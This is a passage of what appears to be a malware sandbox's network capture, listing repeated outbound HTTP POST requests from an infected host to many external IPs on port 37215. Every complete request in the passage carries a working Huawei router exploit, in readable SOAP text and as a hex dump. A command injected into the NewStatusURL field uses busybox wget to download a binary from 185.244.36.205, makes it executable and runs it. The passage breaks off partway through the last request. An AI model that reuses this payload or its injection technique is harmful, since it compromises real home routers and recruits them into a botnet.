                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              754192.168.2.1538626122.2.156.17437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226950884 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              755192.168.2.1540580157.119.232.5537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226994038 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              756192.168.2.1556448197.182.110.5237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226998091 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              757192.168.2.154805245.7.227.5337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227049112 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              758192.168.2.1536330186.50.129.12437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227078915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              759192.168.2.1556358197.109.194.14537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227104902 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              760192.168.2.1548986102.91.24.24037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227107048 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              761192.168.2.155644245.170.254.19137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227138042 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              762192.168.2.1549038190.159.105.25137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227199078 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              763192.168.2.154898045.5.198.14137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227262020 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              764192.168.2.1546014122.76.2.11837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.227262020 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
